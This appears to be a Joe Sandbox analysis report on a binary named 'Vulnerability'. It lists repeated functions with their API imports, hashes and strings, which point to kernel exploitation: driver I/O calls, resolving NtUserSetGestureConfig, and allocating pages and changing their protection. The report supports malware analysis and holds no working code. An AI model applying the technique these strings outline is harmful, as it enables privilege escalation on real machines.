Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
String ID: PAGE$PAGELK$[!] Failed to find MmAllocateIndependentPagesEx$[!] Failed to find MmSetPageProtection$[-] Error allocating independent pages$[-] Failed to change page protections$x????xxxxxxxx????xxxxxxxxx????xxxxxxxx$xx????x???x?x????xxxxxxx????x
API String ID: 3057132824-3125098887
Opcode ID: c65bfcfda9cfef02c1c3b461ffcb51f887d8cd59c0a931d906dc0d7abb988730
Instruction ID: f2228cf312c09806de92f42ac7ffe5bd225ec130efb8b5e44701e86833b0db88
Opcode Fuzzy Hash: c65bfcfda9cfef02c1c3b461ffcb51f887d8cd59c0a931d906dc0d7abb988730
Instruction Fuzzy Hash: A4514F63A38B4391EA80EB55F4402B5E3A0BF94784FC40235E94C6B655EF7EE568C730

Function 00007FF7738EBD20 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EBD6B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EBD93
GetProcAddress.KERNEL32 ref: 00007FF7738EBDCD
DeviceIoControl.KERNEL32 ref: 00007FF7738EBE5B
DeviceIoControl.KERNEL32 ref: 00007FF7738EBF1D

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EBDC3
EtwB, xrefs: 00007FF7738EBE9A
0, xrefs: 00007FF7738EBED4
[-] Failed to load win32u.dll, xrefs: 00007FF7738EBD76
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EBDDB
win32u.dll, xrefs: 00007FF7738EBD64

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$EtwB$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-3808327900
Opcode ID: cf66b3f38dcf4d3a9a7327c216e93a6944e3f795d947650dbe4c5c7819eeb512
Instruction ID: b3e9d8a16b0a4305981f42081e9b6b4d8c7647446c50d9d48e14c4e19b2c05f0
Opcode Fuzzy Hash: cf66b3f38dcf4d3a9a7327c216e93a6944e3f795d947650dbe4c5c7819eeb512
Instruction Fuzzy Hash: C5516B32B38B4299EB41AB61E4406A9B3B5FB48788F944236DE4D27718DF3ED125C760

Function 00007FF7738EB8F0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 140libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EB940
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EB968
GetProcAddress.KERNEL32 ref: 00007FF7738EB9A1
DeviceIoControl.KERNEL32 ref: 00007FF7738EBA2A
DeviceIoControl.KERNEL32 ref: 00007FF7738EBAED

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EB997
[-] Failed to load win32u.dll, xrefs: 00007FF7738EB94B
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EB9AF
win32u.dll, xrefs: 00007FF7738EB939
0, xrefs: 00007FF7738EBAA4

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 4a16b1ada031b150b2b8d2dcce7d48610a6e21dd2b4b51e815d46b0d6f9e9645
Instruction ID: 0de819c18e7b6b3a05c63e774e0cff394a677f3feb81e6df03f1b3c1fa3ad2c3
Opcode Fuzzy Hash: 4a16b1ada031b150b2b8d2dcce7d48610a6e21dd2b4b51e815d46b0d6f9e9645
Instruction Fuzzy Hash: 3B518F33B39B4299EB51EB60E4502ADB3A4BB48788F944236DE4D27758EF3DD125C320

Function 00007FF7738EC360 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EC3B0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EC3D8
GetProcAddress.KERNEL32 ref: 00007FF7738EC411
DeviceIoControl.KERNEL32 ref: 00007FF7738EC49A
DeviceIoControl.KERNEL32 ref: 00007FF7738EC55D

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EC407
0, xrefs: 00007FF7738EC514
[-] Failed to load win32u.dll, xrefs: 00007FF7738EC3BB
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EC41F
win32u.dll, xrefs: 00007FF7738EC3A9

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 0189528ef7c060203cb5a5ab4d0c9625ade21ed828765cb2f23712110881f831
Instruction ID: 6e092cbf00b3d80279d97d0f89f3ebad7e0683974b6fc8441c755f26be5c6ba1
Opcode Fuzzy Hash: 0189528ef7c060203cb5a5ab4d0c9625ade21ed828765cb2f23712110881f831
Instruction Fuzzy Hash: 2A517D33B79B4299EB50EB60E4802ADA7B0BB48788F844136DE4D67754DF3DD525C320

Function 00007FF7738EB4A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 134libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EB4EC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EB514
GetProcAddress.KERNEL32 ref: 00007FF7738EB54D
DeviceIoControl.KERNEL32 ref: 00007FF7738EB5DB
DeviceIoControl.KERNEL32 ref: 00007FF7738EB6AD

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EB543
[-] Failed to load win32u.dll, xrefs: 00007FF7738EB4F7
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EB55B
win32u.dll, xrefs: 00007FF7738EB4E5
0, xrefs: 00007FF7738EB664

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 06b1d522afc2fc725674bda80df19a16bdf6ef3f2e5376094a840899f2687690
Instruction ID: 9c581ce27a505990b08f79e8f758cd98ddb9a93c24a42eb2d8931bf0ee46dd9a
Opcode Fuzzy Hash: 06b1d522afc2fc725674bda80df19a16bdf6ef3f2e5376094a840899f2687690
Instruction Fuzzy Hash: 50519033B38B4289EB51EB61E8402A9B3B0BB48788F940235DE4C23754DF3DD129C760

Function 00007FF7738EC580 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 133libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EC5D0
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EC5F8
GetProcAddress.KERNEL32 ref: 00007FF7738EC631
DeviceIoControl.KERNEL32 ref: 00007FF7738EC6BA
DeviceIoControl.KERNEL32 ref: 00007FF7738EC77D

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EC627
0, xrefs: 00007FF7738EC734
[-] Failed to load win32u.dll, xrefs: 00007FF7738EC5DB
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EC63F
win32u.dll, xrefs: 00007FF7738EC5C9

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 039b7fc1059e6048e64b06d3a02e17fc5b2c72a20a02f9f7bcf2363af708e68e
Instruction ID: 38ac9b7a5b3c703d4484a006fdf5a17d16a199e05be73808d231d7cbd3149445
Opcode Fuzzy Hash: 039b7fc1059e6048e64b06d3a02e17fc5b2c72a20a02f9f7bcf2363af708e68e
Instruction Fuzzy Hash: 4B515C33B38B4299EB50EB60E8502A9B3B4BB48788F944236DE4D67754DF3DD525C720

Function 00007FF7738EAC30 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EAC7C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EACA4
GetProcAddress.KERNEL32 ref: 00007FF7738EACDD
DeviceIoControl.KERNEL32 ref: 00007FF7738EAD6B
DeviceIoControl.KERNEL32 ref: 00007FF7738EAE2D

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EACD3
[-] Failed to load win32u.dll, xrefs: 00007FF7738EAC87
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EACEB
win32u.dll, xrefs: 00007FF7738EAC75
0, xrefs: 00007FF7738EADE4

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: de231e250a37e9cfbd19bf2b748ef2b0fbae5512ce2dc155a550e27e2751eba5
Instruction ID: 9445923096798243a18b15eb9baf9ec1c32683399eae49afa6f603bdde91704d
Opcode Fuzzy Hash: de231e250a37e9cfbd19bf2b748ef2b0fbae5512ce2dc155a550e27e2751eba5
Instruction Fuzzy Hash: 32517F37B38B5289EB50EB60E8402A9B3B4BB58788F945136DE4D27754EF3DD129C720

Function 00007FF7738EB280 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 132libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EB2CC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EB2F4
GetProcAddress.KERNEL32 ref: 00007FF7738EB32D
DeviceIoControl.KERNEL32 ref: 00007FF7738EB3BB
DeviceIoControl.KERNEL32 ref: 00007FF7738EB47D

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EB323
[-] Failed to load win32u.dll, xrefs: 00007FF7738EB2D7
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EB33B
win32u.dll, xrefs: 00007FF7738EB2C5
0, xrefs: 00007FF7738EB434

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: cda18cfaedf71214e2580422a616da068b0d926fcd9c1f401b8ab5f2bbca997e
Instruction ID: 37b0a3922c70bdd02a36f91b5437f94bf5c6530148542b8c44e7c2b4ba403d79
Opcode Fuzzy Hash: cda18cfaedf71214e2580422a616da068b0d926fcd9c1f401b8ab5f2bbca997e
Instruction Fuzzy Hash: 73515937B38B4289EB41EB61E4402ADB3B4BB58788F944236DE4D27758DE3DD129C760

Function 00007FF7738EB060 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 131libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EB0AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EB0D4
GetProcAddress.KERNEL32 ref: 00007FF7738EB10D
DeviceIoControl.KERNEL32 ref: 00007FF7738EB19B
DeviceIoControl.KERNEL32 ref: 00007FF7738EB25D

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EB103
[-] Failed to load win32u.dll, xrefs: 00007FF7738EB0B7
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EB11B
win32u.dll, xrefs: 00007FF7738EB0A5
0, xrefs: 00007FF7738EB214

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 696fafbb10d234c9b031ff39d56c918c4f95ceb4b059a0e50e847bfe7e58d082
Instruction ID: b81afc4bddba95427400d2faf3a8ac4879d5a152391fc73c82c824927bb4d192
Opcode Fuzzy Hash: 696fafbb10d234c9b031ff39d56c918c4f95ceb4b059a0e50e847bfe7e58d082
Instruction Fuzzy Hash: FA516D37B38B4289EB41EB61E4402AAB7B0BB58788F944236DE4D27754DF3DD129C760

Function 00007FF7738EB6D0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 130libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EB71C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EB744
GetProcAddress.KERNEL32 ref: 00007FF7738EB77D
DeviceIoControl.KERNEL32 ref: 00007FF7738EB80B
DeviceIoControl.KERNEL32 ref: 00007FF7738EB8CD

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EB773
[-] Failed to load win32u.dll, xrefs: 00007FF7738EB727
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EB78B
0, xrefs: 00007FF7738EB884
win32u.dll, xrefs: 00007FF7738EB715

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 5a8b8bb835ced192fd94a3754e2a7d1210578acb61fbe328b7f7acd386f9278f
Instruction ID: 26da0ccc6f1bf040a3eab05ffe35779d7326da03e155483b8518d7045ce8fd55
Opcode Fuzzy Hash: 5a8b8bb835ced192fd94a3754e2a7d1210578acb61fbe328b7f7acd386f9278f
Instruction Fuzzy Hash: 5B517F37B38B4299EB41AB60E8502A9B3A4FB48788F844235DE4D27B54DF3DD129C760

Function 00007FF7738EBF40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7738EBF8C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7738EBFB4
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,FFFFFFFF,?), ref: 00007FF7738EBFED
DeviceIoControl.KERNEL32 ref: 00007FF7738EC07B
DeviceIoControl.KERNEL32 ref: 00007FF7738EC12F

Strings

0, xrefs: 00007FF7738EC0E6
NtUserSetGestureConfig, xrefs: 00007FF7738EBFE3
[-] Failed to load win32u.dll, xrefs: 00007FF7738EBF97
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EBFFB
win32u.dll, xrefs: 00007FF7738EBF85

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 3ae26c6a1d4a30df7b314448e0ede12cafd3c87fecc513ff00560ec475eee002
Instruction ID: af277553cb5b77824c27968519ee924758a45edfa24a402b43b14f3294136296
Opcode Fuzzy Hash: 3ae26c6a1d4a30df7b314448e0ede12cafd3c87fecc513ff00560ec475eee002
Instruction Fuzzy Hash: C2517D33B38B4299EB40EB60E4502A9B3B0BB58788F844236DE4D27754DF3DD129C760

Function 00007FF7738EAE50 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 129libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EAE9C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EAEC4
GetProcAddress.KERNEL32 ref: 00007FF7738EAEFD
DeviceIoControl.KERNEL32 ref: 00007FF7738EAF8B
DeviceIoControl.KERNEL32 ref: 00007FF7738EB040

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EAEF3
[-] Failed to load win32u.dll, xrefs: 00007FF7738EAEA7
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EAF0B
0, xrefs: 00007FF7738EAFF7
win32u.dll, xrefs: 00007FF7738EAE95

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: b3bf6dfa7214b6056b035d8a34bf148732bd822a1a6b1dfc7babd26445247d4e
Instruction ID: 1b543144f80d95b74c7db8cceda29493dce8ad61b09459b4ce171da3a8069ec6
Opcode Fuzzy Hash: b3bf6dfa7214b6056b035d8a34bf148732bd822a1a6b1dfc7babd26445247d4e
Instruction Fuzzy Hash: F3516C37B38B4299EB40EB60E4502A9B3A4FB58788F944236DE4D2B754DF3DD129C720

Function 00007FF7738EEC90 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 128libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EECD5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EECFD
GetProcAddress.KERNEL32 ref: 00007FF7738EED36
DeviceIoControl.KERNEL32 ref: 00007FF7738EEDCB
DeviceIoControl.KERNEL32 ref: 00007FF7738EEE81

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EED2C
0, xrefs: 00007FF7738EEE38
[-] Failed to load win32u.dll, xrefs: 00007FF7738EECE0
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EED44
win32u.dll, xrefs: 00007FF7738EECCE

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
API String ID: 2058718191-1835519504
Opcode ID: 10fecf31a859fb0784b16addc07fe4d4259dd89a3fcb524d2f7f5ce2d8d455a0
Instruction ID: 45c500df0e34bc05ee498ca3e95622ffbd3594014555ed7742137f7abba553d0
Opcode Fuzzy Hash: 10fecf31a859fb0784b16addc07fe4d4259dd89a3fcb524d2f7f5ce2d8d455a0
Instruction Fuzzy Hash: 34516B36B38B4299EB50EB60E4402A9B3A5FB58788F944236DE4D27754DF3DE129C360

Function 00007FF7738EBB10 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 128libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF7738EBB5C
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EBB84
GetProcAddress.KERNEL32 ref: 00007FF7738EBBBD
DeviceIoControl.KERNEL32 ref: 00007FF7738EBC4B
DeviceIoControl.KERNEL32 ref: 00007FF7738EBCFD

Strings

NtUserSetGestureConfig, xrefs: 00007FF7738EBBB3
[-] Failed to load win32u.dll, xrefs: 00007FF7738EBB67
[-] Failed to get export win32u.NtUserSetGestureConfig, xrefs: 00007FF7738EBBCB
win32u.dll, xrefs: 00007FF7738EBB55
0, xrefs: 00007FF7738EBCB4

Memory Dump Source

